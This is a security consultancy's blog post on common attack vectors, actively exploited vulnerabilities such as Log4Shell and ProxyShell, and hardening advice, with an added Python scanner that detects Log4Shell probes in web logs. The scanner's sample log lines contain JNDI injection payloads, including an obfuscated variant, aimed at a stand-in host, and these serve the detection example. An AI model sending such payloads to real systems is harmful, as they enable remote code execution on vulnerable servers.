Staying Safe in the Current Cyber Threat Landscape

With the current geopolitical headlines, now more than ever is the time to become aware of what cyber threats exist and what mitigations can be put in place. This post serves as a quick, high-level reference explaining common attack vectors and offering several key steps to take in hardening your organization.

Common Attack Vectors

  • Email - Attackers leverage phishing e-mails to gain access to user accounts. From there, it is possible to access the corporate network and attempt to increase permissions before stealing data or deploying ransomware.

  • VPNs - VPNs are a direct foothold into the network. Should unpatched vulnerabilities exist on perimeter devices, an attacker can find themselves on the network upon exploitation. Additionally, without multi-factor authentication, a compromised user account may allow authenticated access to the network via a VPN.

  • Unpatched External Systems - Every day thousands of scans take place across the internet poking at various internet devices and hosted services. Unpatched systems facing the internet can be another easy entryway for an attacker.

Common Exploited Vulnerabilities

Over the last year, there have been a few vulnerabilities making headlines due to their prevalence across multiple technologies and the impact they have when exploited. These vulnerabilities are the top ones to watch for and ensure you are patched against, as they are actively being exploited. Included below are disclosures by the original authors.

  • Log4Shell - (CVE-2021-44228) - The zero-day vulnerability in the Log4J Java logging framework allowed for arbitrary code execution. Vulnerable devices can quickly be taken over by an attacker.

  • ProxyShell - Consisting of three vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), ProxyShell targets Microsoft Exchange Server. By chaining the vulnerabilities, an attacker can execute arbitrary code through an exposed port 443, taking over the server.

  • Various VPN Vulnerabilities - PulseVPN and SonicWall have seen vulnerabilities in the last year targeted by ransomware groups and state actors alike. Ensure any publicly facing networking devices are patched.

General Steps to Stay Safe

  • Identify and ensure externally facing assets have been configured correctly and are adequately patched. Consider decommissioning extraneous externally facing assets.

  • Employ Multi-Factor Authentication on all assets that support it. Consider placing applications and services that do not support MFA behind a VPN that does support MFA.

  • Invest in Employee Security Awareness Training. Reduce the risk of the human element by ensuring employees can recognize Business Email Compromise and Phishing Attacks.

  • Segment networks and isolate critical devices. Flat networks can quickly be taken over should one device become compromised.

  • Critical assets, sometimes referred to as ‘Crown Jewels’, should have additional layers of security.

  • Ensure adequate logging is taking place throughout the organization. Detecting and responding to potentially malicious activity is far more challenging without logging enabled.
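As an added example that is not part of the original post, the following Python scanner shows what the logging advice above buys you in practice: run over web-server log lines, it flags requests carrying the `${jndi:` lookup string that Log4Shell (CVE-2021-44228) abuses. The sample log lines are constructed, and the Combined Log Format and the case-folding variant the scanner normalizes are assumptions, not something the post discusses.

```python
import re

# Constructed sample web-server log lines (not real traffic). The third and
# fourth lines carry the ${jndi:...} lookup string that CVE-2021-44228 abuses,
# once in the User-Agent and once, lightly disguised, in the query string.
SAMPLE_LOGS = [
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [12/Dec/2021:10:01:09 +0000] "GET /login HTTP/1.1" 200 1024 "-" "curl/7.79.1"',
    '203.0.113.9 - - [12/Dec/2021:10:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [12/Dec/2021:10:02:16 +0000] "GET /?x=${${lower:j}ndi:rmi://203.0.113.9/b} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

# Log4j's ${lower:x} / ${upper:x} lookups are sometimes wrapped around letters
# of "jndi" so a naive substring match misses them; fold them back to the letter.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def normalize(line: str) -> str:
    """Unwrap ${lower:..}/${upper:..} repeatedly so nested forms collapse."""
    prev = None
    while prev != line:
        prev = line
        line = _CASE_LOOKUP.sub(lambda m: m.group(1), line)
    return line


def scan_logs(lines):
    """Return one record per log line that contains a JNDI lookup string."""
    hits = []
    for raw in lines:
        if _JNDI.search(normalize(raw)):
            # Assumes Combined Log Format: client address is the first field.
            hits.append({"source_ip": raw.split(" ", 1)[0], "line": raw})
    return hits


if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(f"[Log4Shell probe] from {hit['source_ip']}: {hit['line']}")
```

Feeding real access logs through `scan_logs` gives a quick triage list of source addresses to investigate; without request logging enabled, none of this evidence exists.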

Pay Attention to Government Guidelines

Various government organizations such as the Cybersecurity and Infrastructure Security Agency (CISA) and the FBI often release information on the current threat landscape and active attack methods. As vulnerabilities are published, ensure corporate assets are patched in a timely manner - especially those that are externally facing.

Contact Us

Thoreson Consulting is here to assist any organization with general questions on the current threat landscape and how to stay secure. The topics in this blog post are high-level and should serve as a starting point for organizations interested in becoming more secure. Please reach out to us if additional guidance is needed.

We are also eager to assist in performing risk assessments, facilitating employee training, or working together to improve your organization’s overall posture.
